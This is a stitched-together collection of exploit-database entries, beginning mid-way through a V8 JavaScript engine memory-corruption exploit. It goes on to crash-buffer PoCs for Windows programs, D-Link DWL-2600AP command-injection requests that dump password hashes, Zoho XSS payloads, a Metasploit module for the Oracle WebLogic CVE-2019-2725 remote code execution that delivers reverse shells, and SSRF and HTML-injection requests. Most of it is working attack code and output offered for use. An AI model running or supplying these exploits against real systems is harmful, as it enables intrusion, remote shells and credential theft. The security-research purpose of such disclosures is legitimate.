u64[offset/8n + 0x3n] = 0x41414141n; // prototype
u64[offset/8n + 0x4n] = 0x41414141n; // constructor or back ptr
u64[offset/8n + 0x5n] = 0n; // transistions or proto info
u64[offset/8n + 0x6n] = 0x41414141n; // instance descriptors
u64[offset/8n + 0x7n] = 0n; // layout descriptor
u64[offset/8n + 0x8n] = 0x41414141n; // dependent code
u64[offset/8n + 0x9n] = 0n; // prototype validity cell
}
// SPACE_SIZE = 1<<18
// LARGE_OBJ_SIZE = (1<<17) +1
const SPACE_SIZE = 1n<<19n;
const SPACE_MASK = 0xffffffffffffffffn ^ (SPACE_SIZE-1n);
let space_start_addr = (ab_addr & SPACE_MASK) + SPACE_SIZE;
let space_start_off = space_start_addr - ab_addr;
console.log(`Space start: ${space_start_addr.hex()}`);
let free_mem = space_start_addr + 4096n;
function page_round(addr) {
if ((addr & 0xfffn) == 0n) {
return addr;
}
return (addr + 0x1000n) & 0xfffffffffffff000n;
}
function u64_offset(addr) {
return (addr - ab_addr) / 8n;
}
class V8String {
constructor(type, data) {
let size = BigInt(data.length)*8n;
this.addr = free_mem;
free_mem += page_round(size);
this.map = free_mem;
free_mem += page_round(0x9n*8n);
this.off = u64_offset(this.addr);
u64[this.off] = this.map|1n;
for (let i = 0n; i < data.length; i++) {
u64[this.off + 1n + i] = data[i];
}
let map_off = u64_offset(this.map);
u64[map_off + 0x0n] = 0x12345n;
u64[map_off + 0x1n] = 0x190000002900a804n | (type << 32n);
u64[map_off + 0x2n] = 0x92003ffn; // bitfield 3
u64[map_off + 0x3n] = 0x41414141n; // prototype
u64[map_off + 0x4n] = 0x41414141n; // constructor or back ptr
u64[map_off + 0x5n] = 0n; // transistions or proto info
u64[map_off + 0x6n] = 0x41414141n; // instance descriptors
u64[map_off + 0x7n] = 0n; // layout descriptor
u64[map_off + 0x8n] = 0x41414141n; // dependent code
u64[map_off + 0x9n] = 0n; // prototype validity cell
}
}
class ConsString extends V8String {
constructor(size, left, right) {
super(0x29n, [(size<<32n) | 0x00000003n, left|1n, right|1n]);
}
}
class SliceString extends V8String {
constructor(parent_string, offset, len=0x100n) {
super(0x2bn, [(len<<32n) | 0x00000003n, parent_string|1n, offset<<32n]);
}
}
class SeqString extends V8String {
constructor(data) {
super(0x08n, [(BigInt(data.length*8) << 32n | 0xdf61f02en)].concat(data));
}
}
// object in young generation == space+8 has one of these bits set: 0x18
u64[space_start_off/8n + 0x1n] = 0x18n;
LEAK_STRING_SZ = 0x1;
let seq_string = new SeqString([0x4141414141414141n]);
let root_string = new ConsString(BigInt(LEAK_STRING_SZ), seq_string.addr, seq_string.addr);
function foo(i, arr, to_search, to_copy) {
arr.__defineSetter__(i, ()=>{});
let a = [1.1, to_copy];
let boundary = [to_search];
return [arr.indexOf(to_search), a, boundary];
}
for (let i = 0; i < 100000; i++) {
foo('', [Array], '', 1.1);
}
function doit(to_search, to_copy) {
return foo('100000', [Array], to_search, to_copy)[0];
}
doit('A'.repeat(LEAK_STRING_SZ), (root_string.addr|1n).to_float());
let corrupted_array = [1.1, 1.2, 1.3];
console.log(`string at = ${u64[root_string.off+2n].hex()}`);
let corrupted_array_addr = u64[root_string.off+2n]+0x40n;
let backing_store_sz_addr = corrupted_array_addr + 0x38n;
GC_STRING_SZ = 0x30000000;
u64[space_start_off/8n + 0x0n] = 0x1234n;
// object in young generation == space+8 has one of these bits set: 0x18
u64[space_start_off/8n + 0x1n] = 0xff000n;
// marking bitmap pointer
u64[space_start_off/8n + 0x2n] = backing_store_sz_addr + 4n - (0x70n*0x4n);
u64[space_start_off/8n + 0x6n] = space_start_addr;
// incremental_marking ptr
u64[space_start_off/8n + 0xf7n] = space_start_addr;
seq_string = new SeqString([0x4141414141414141n]);
root_string = new ConsString(BigInt(GC_STRING_SZ), seq_string.addr, seq_string.addr);
doit('A'.repeat(GC_STRING_SZ), (root_string.addr|1n).to_float());
corrupted_array[100] = 1.1;
console.log('=== OOB array leak ===');
for (let i = 0; i < 100; i++) {
console.log(corrupted_array[i].hex());
}
</script>
# -*- coding: utf-8 -*-
# Exploit Title: Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)
# Date: 13/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.pixarra.com
# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbselfiestudio_install.exe
# Version: 2.17
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "Selfie_resize.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open Selfie Studio
# 4.- Go to 'Image' > 'Resize Image...'
# 5.- Paste clipboard in the 'New Width/New Height' field
# 6.- Click OK
# 7.- Crashed
buffer = "\x41" * 1000
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()
Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Restore Configuration)
Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)
Exploitation Technique:
=======================
Local
Severity Level:
===============
HIGH
CVE: CVE-2019-20499
CVE: CVE-2019-20500
CVE: CVE-2019-20501
Base Score (CVSS):
===============
7.8
===============
Request Method(s):
[+] POST
URL Path :
[+] /admin.cgi?action=config_restore
Vulnerable POST Form Data Parameter:
[+] configRestore
[+] configServerip
===========================
Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
[+] WLAN-EAP
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by local authenticated attackers.
there is no input validation on the POST Form Data Parameter "configRestore"
and the Form Data Parameter "configServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the Panel .
For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot2.jpg .
--- PoC Session Logs ---
POST /admin.cgi?action=config_restore HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 357
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=config_restore
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=UQAafLpviZXbWDQpJAnrNmEJoFQIBAcX; clickedFolderFrameless=43%5E
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="optprotocol"
up
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="configRestore"
;whoami;
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="configServerip"
;cat /var/passwd;cat /var/passwd
------WebKitFormBoundary4ZAwHsdySFjwNXxE--
----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
sh: whoami: not found
sh: whoami: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false
Note : for testing put the values in the fields like this :
;command1;same_command1;command2;command2
----+Discovered By Raki Ben Hamouda----+
Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Save Configuration)
Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)
Exploitation Technique:
=======================
Local
Severity Level:
===============
HIGH
Base Score (CVSS):
===============
7.8
===============
Request Method(s):
[+] POST
URL Path :
[+] /admin.cgi?action=config_save
Vulnerable POST Form Data Parameter:
[+] configBackup
[+] downloadServerip
==========================
Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
[+] WLAN-EAP
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote or local authenticated attackers.
there is no input validation on the POST Form Data Parameter "configBackup"
and the Form Data Parameter "downloadServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the Panel .
For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot3.jpg .
--- PoC Session Logs ---
POST /admin.cgi?action=config_save HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 114
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=config_save
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E
check_tftp=up&configBackup=;whoami;whoami;.xml&downloadServerip=;cat /var/passwd;cat /var/passwd
----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
sh: whoami: not found
sh: whoami: not found
sh: .xml: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false
Note : for testing put the values in the fields like this :
;command1;same_command1;command2;etc...
----+Discovered By Raki Ben Hamouda----+
Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Upgrade Firmware)
Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)
Exploitation Technique:
=======================
Local
Severity Level:
===============
HIGH
Base Score (CVSS):
===============
7.8
===============
Request Method(s):
[+] POST
URL Path :
[+] /admin.cgi?action=upgrade
Vulnerable POST Form Data Parameter:
[+] firmwareRestore
[+] firmwareServerip
===========================
Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
[+] WLAN-EAP
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by local authenticated attackers.
there is no input validation on the POST Form Data Parameter "firmwareRestore"
and the Form Data Parameter "firmwareServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the Panel .
For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot1.jpg .
--- PoC Session Logs ---
POST /admin.cgi?action=upgrade HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 525
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
User-Agent: xxxxxxxxw
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=upgrade
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="optprotocol"
up
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="firmwareRestore"
;whoami;whoami
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="firmwareServerip"
;cat /var/passwd;cat /var/passwd
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="update.device.packet-capture.stop-capture"
up
------WebKitFormBoundaryBy0MsFaBOhdU6YJL--
----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
sh: whoami: not found
sh: whoami: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false
Note : for testing put the values in the fields like this :
;command1;same_command1;command2;etc...
----+Discovered By Raki Ben Hamouda----+
# -*- coding: utf-8 -*-
# Exploit Title: TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)
# Date: 13/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.pixarra.com
# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
# Version: 24.06
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "TwistedBrush_recorder.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open TwistedBrush Pro Studio
# 4.- Go to 'Record' > 'Script Recorder...'
# 5.- Paste clipboard in the 'Description' field
# 6.- Click 'Brush' button
# 7.- Crashed
buffer = "\x41" * 500000
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()
# -*- coding: utf-8 -*-
# Exploit Title: TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)
# Date: 13/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.pixarra.com
# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
# Version: 24.06
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "TwistedBrush_player.py", it will create a new file "sample.srp"
# 2.- Open TwistedBrush Pro Studio
# 3.- Go to 'Record' > 'Script Player...'
# 4.- Click 'Import' button, select the 'sample.srp' file created and click 'Open' button
# 5.- Crashed
buffer = "\x41" * 500000
f = open ("sample.srp", "w")
f.write(buffer)
f.close()
# -*- coding: utf-8 -*-
# Exploit Title: TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)
# Date: 13/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.pixarra.com
# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
# Version: 24.06
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "TwistedBrush _resize.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open TwistedBrush Pro Studio
# 4.- Go to 'Image' > 'Resize Image...'
# 5.- Paste clipboard in the 'New Width/New Height' field
# 6.- Click OK
# 7.- Crashed
buffer = "\x41" * 1000
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()
[+] Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Multiple Cross-Site Scripting
[+] Author: Ibrahim Raafat
[+] Twitter: https://twitter.com/RaafatSEC
[+] Download: https://www.manageengine.com/products/self-service-password/download-free.html?
[+] TimeLine
[-] Nov 23, 2018 Reported
[-] Nov 26, 2018 Triaged
[-] Dec 27, 2018 Fixed
[-] May 08, 2019 Public Disclosure
[+] Description:
Zoho ManageEngine ADSelfService Plus 5.7 before build 5702 has Multiple XSS vulnerabilites
[+] POC
[-] Employee search form
POST /EmployeeSearch.cc?actionId=Search HTTP/1.1
searchString=dddddffff");a=alert,a(31337)//&&searchType=contains&searchBy=ALL_FIELDS333');a=alert,a(31337)//&adscsrf=
searchType parameter:
searchString=a&searchType=containss9ek";a=alert,a(31337)//&searchBy=ALL_FIELDS&adscsrf=
2- Employee Search – ascending parameter
/EmployeeSearch.cc?actionId=showList&searchBy=ALL_FIELDS&searchType=contains&PAGE_NUMBER=37&FROM_INDEX=22&TO_INDEX=22&RANGE=100&navigate=true&navigationType=&START_INDEX=22 HTTP/1.1
selOUs=&genID=12191&ACTIVE_TAB=user&sortIndex=0&ascending=true’;a=alert,a(31337)//&&searchString=a&TOTAL_RECORDS=22&adscsrf=
3- EmpSearch.cc - searchString parameter
POST /EmpSearch.cc?operation=getSearchResult&REQUEST_TYPE=JSON&searchString=RR<svg%2fonload%3dprompt(8)>&searchType=contains&searchBy=ALL_FIELDS&actionId=Search HTTP/1.1
&adscsrf=
4- Stored XSS in self-update layout implementation.
/SelfService.do?methodToCall=selfService&selectedTab=UpdateFields
Insert the following payload into Mobile Number field, and save
Payload: 11111111]";a=alert,a(31337)//
Code execute here:
/Enrollment.do?selectedTab=Enrollment
[+] Assigned CVE: CVE-2018-20484,CVE-2018-20485
[+] Release Notes: https://www.manageengine.com/products/self-service-password/release-notes.html
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
'Description' => %q{
An unauthenticated attacker with network access to the Oracle Weblogic Server T3
interface can send a malicious SOAP request to the interface WLS AsyncResponseService
to execute code on the vulnerable host.
},
'Author' =>
[
'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-2725'],
['CNVD-C', '2019-48814'],
['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],
['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html']
],
'Privileged' => false,
'Platform' => %w{ unix win solaris },
'Targets' =>
[
[ 'Unix',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
],
[ 'Windows',
'Platform' => 'win',
'Arch' => [ARCH_X64, ARCH_X86],
'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
],
[ 'Solaris',
'Platform' => 'solaris',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
'Payload' => {
'Space' => 2048,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'WfsDelay' => 12
},
'DisclosureDate' => 'Apr 23 2019'))
register_options(
[
Opt::RPORT(7001),
OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
]
)
end
def check
res = send_request_cgi(
'uri' => normalize_uri(datastore['WSPATH']),
'method' => 'POST',
'ctype' => 'text/xml',
'headers' => {'SOAPAction' => '' }
)
if res && res.code == 500 && res.body.include?("<faultcode>env:Client</faultcode>")
vprint_status("The target returned a vulnerable HTTP code: /#{res.code}")
vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}")
Exploit::CheckCode::Vulnerable
elsif res && res.code != 202
vprint_status("The target returned a non-vulnerable HTTP code")
Exploit::CheckCode::Safe
elsif res.nil?
vprint_status("The target did not respond in an expected way")
Exploit::CheckCode::Unknown
else
vprint_status("The target returned HTTP code: #{res.code}")
vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]")
Exploit::CheckCode::Unknown
end
end
def exploit
print_status("Generating payload...")
case target.name
when 'Windows'
string0_cmd = 'cmd.exe'
string1_param = '/c'
shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
when 'Unix','Solaris'
string0_cmd = '/bin/bash'
string1_param = '-c'
shell_payload = payload.encoded
end
random_action = rand_text_alphanumeric(20)
random_relates = rand_text_alphanumeric(20)
soap_payload = %Q|<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"|
soap_payload << %Q|xmlns:wsa="http://www.w3.org/2005/08/addressing"|
soap_payload << %Q|xmlns:asy="http://www.bea.com/async/AsyncResponseService">|
soap_payload << %Q|<soapenv:Header>|
soap_payload << %Q|<wsa:Action>#{random_action}</wsa:Action>|
soap_payload << %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|
soap_payload << %Q|<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">|
soap_payload << %Q|<void class="java.lang.ProcessBuilder">|
soap_payload << %Q|<array class="java.lang.String" length="3">|
soap_payload << %Q|<void index="0">|
soap_payload << %Q|<string>#{string0_cmd}</string>|
soap_payload << %Q|</void>|
soap_payload << %Q|<void index="1">|
soap_payload << %Q|<string>#{string1_param}</string>|
soap_payload << %Q|</void>|
soap_payload << %Q|<void index="2">|
soap_payload << %Q|<string>#{shell_payload.encode(xml: :text)}</string>|
#soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|
soap_payload << %Q|</void>|
soap_payload << %Q|</array>|
soap_payload << %Q|<void method="start"/>|
soap_payload << %Q|</void>|
soap_payload << %Q|</work:WorkContext>|
soap_payload << %Q|</soapenv:Header>|
soap_payload << %Q|<soapenv:Body>|
soap_payload << %Q|<asy:onAsyncDelivery/>|
soap_payload << %Q|</soapenv:Body>|
soap_payload << %Q|</soapenv:Envelope>|
uri = normalize_uri(datastore['WSPATH'])
if uri.nil?
datastore['URIPATH'] = "http://#{RHOST}:#{RPORT}/"
end
print_status("Sending payload...")
begin
res = send_request_cgi(
'uri' => uri,
'method' => 'POST',
'ctype' => 'text/xml',
'data' => soap_payload,
'headers' => {'SOAPAction' => '' }
)
rescue Errno::ENOTCONN
fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.")
end
if res.nil?
fail_with(Failure::Unreachable, "No response from host")
elsif res && res.code != 202
fail_with(Failure::UnexpectedReply,"Exploit failed. Host did not responded with HTTP code #{res.code} instead of HTTP code 202")
end
end
end
# -*- coding: utf-8 -*-
# Exploit Title: Convert Video jetAudio 8.1.7 - Denial of Service (PoC)
# Date: 08/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.jetaudio.com/
# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
# Version: 8.1.7
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "ConvertVideo.py", it will create a new file "ConvertVideo.txt"
# 2.- Copy the text from the generated ConvertVideo.txt file to clipboard
# 3.- Open JetVidCnv.exe or Video Converter
# 4.- Click on the 'Add Files...' button and select a video file
# 5.- Paste clipboard in in the field "File Naming"
# 6.- Click on the 'Preview' button
# 7.- Crashed
buffer = "\x41" * 512
f = open ("ConvertVideo.txt", "w")
f.write(buffer)
f.close()
# -*- coding: utf-8 -*-
# Exploit Title: Lyric Maker 2.0.1.0 - Denial of Service (PoC)
# Date: 08/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.jetaudio.com/
# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
# Version: 2.0.1.0
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "LyricMaker.py", it will create a new file "LyricMaker.txt"
# 2.- Copy the text from the generated LyricMaker.txt file to clipboard
# 3.- Open JetLyric.exe or Lyric Maker
# 4.- Paste clipboard in in the field "Title"
# 5.- Go to file -> Save Lyric...
# 6.- Save the file with any name, e.g 'sample.jlr'
# 7.- Crashed
buffer = "\x41" * 5000
f = open ("LyricMaker.txt", "w")
f.write(buffer)
f.close()
# -*- coding: utf-8 -*-
# Exploit Title: Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)
# Date: 08/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://lyricvideocreator.com/
# Software Link: https://lyricvideocreator.com/dwl/LyricVideoCreator.exe
# Version: 2.1
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "LyricVideo.py", it will create a new file "sample.mp3"
# 2.- Open LyricVideoCreator.exe
# 4.- Click on the 'Browse song' button, select the 'sample.mp3' file created and click on the 'Open' button
# 5.- Crashed
buffer = "\x41" * 5000
f = open ("sample.mp3", "w")
f.write(buffer)
f.close()
# -*- coding: utf-8 -*-
# Exploit Title: SpotIM 2.2 - 'Name/Key' Denial of Service (PoC)
# Date: 09/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.nsauditor.com
# Software Link http://www.nsauditor.com/downloads/spotim_setup.exe
# Version: 2.2
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "SpotIM.py", it will create a new file "SpotIM.txt"
# 2.- Copy the text from the generated SpotIM.txt file to clipboard
# 3.- Open SpotIM
# 4. Select "Register" > "Enter Registration Code..."
# 5.- Paste clipboard in the Name/Key field
# 6.- Click 'OK'
# 7.- Crashed
buffer = "\x41" * 1000
f = open ("SpotIM.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery
# Date: 2/26/2019
# Exploit Author: Alexandre Basquin
# Vendor Homepage: https://blog.thehive-project.org
# Software Link: https://github.com/TheHive-Project/Cortex
# Version: Cortex <= 2.1.3
# Tested on: 2.1.3
# CVE : CVE-2019-7652
# Exploit description
The "UnshortenLink_1_0" analyzer used by Cortex contains an SSRF vulnerability
POC:
1. Create a new analysis
2. Select Data Type "URL"
3. Put your SSRF payload in the Data parameter (e.g. "http://127.0.0.1:22")
4. Result can be seen in the main dashboard.
Reported to TheHive Project by Alexandre Basquin on 1/24/2019
The issue has been fixed in UnshortenLink 1.1 released within Cortex-analyzers 1.15.2
References:
https://blog.thehive-project.org/2019/02/11/unshortenlink-ssrf-and-cortex-analyzers-1-15-2/
#Exploit Title: jetCast Server 2.0 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-09
#Vendor Homepage: http://www.jetaudio.com/
#Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe
#Tested Version: 2.0
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: jetCast_Server_2.0.py
#2.- Open jetCast.txt and copy content to clipboard
#2.- Open jetCast Server
#3.- Select Config
#4.- In "Log directory" Paste ClipBoard
#5.- Click on "Ok"
#6.- Click on "Start"
#7.- Crashed
cod = "\x41" * 5000
f = open('jetCast.txt', 'w')
f.write(cod)
f.close()
#Exploit Title: ASPRunner.NET 10.1 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-09
#Vendor Homepage: https://xlinesoft.com/
#Software Link: https://xlinesoft.com/asprunnernet/download.htm
#Tested Version: 10.1
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: ASPRunner_net_10_1.py
#2.- Open ASPRunner_10_1.txt and copy content to clipboard
#3.- Open ASPRunner.NET
#4.- Click on "Next" > Select "SQLite" database > click on "Next"
#5.- Click on "Create new database"
#6.- In "Table name" field Paste Clipboarad
#7.- Click on "Create table"
#8.- Crashed
cod = "\x41" * 10000
f = open('ASPRunner_10_1.txt', 'w')
f.write(cod)
f.close()
# -*- coding: utf-8 -*-
# Exploit Title: SpotPaltalk 1.1.5 - 'Name/Key' Denial of Service (PoC)
# Date: 09/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.nsauditor.com
# Software Link http://www.nsauditor.com/downloads/spotpaltalk_setup.exe
# Version: 1.1.5
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "SpotPaltalk.py", it will create a new file "SpotPaltalk.txt"
# 2.- Copy the text from the generated SpotPaltalk.txt file to clipboard
# 3.- Open SpotPalTalk
# 4. Select "Register" > "Enter Registration Code..."
# 5.- Paste clipboard in the Name/Key field
# 6.- Click 'OK'
# 7.- Crashed
buffer = "\x41" * 1000
f = open ("SpotPaltalk.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: RICOH SP 4510DN Printer - HTML Injection
# Date: 2019-05-06
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html
# Software: RICOH Printer
# Product Version: SP 4510DN
# Vulernability Type: Code Injection
# Vulenrability: HTML Injection
# CVE: CVE-2019-11845
# An HTML Injection vulnerability has been discovered on the RICOH SP 4510DN via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter.
# HTTP POST Request :
POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
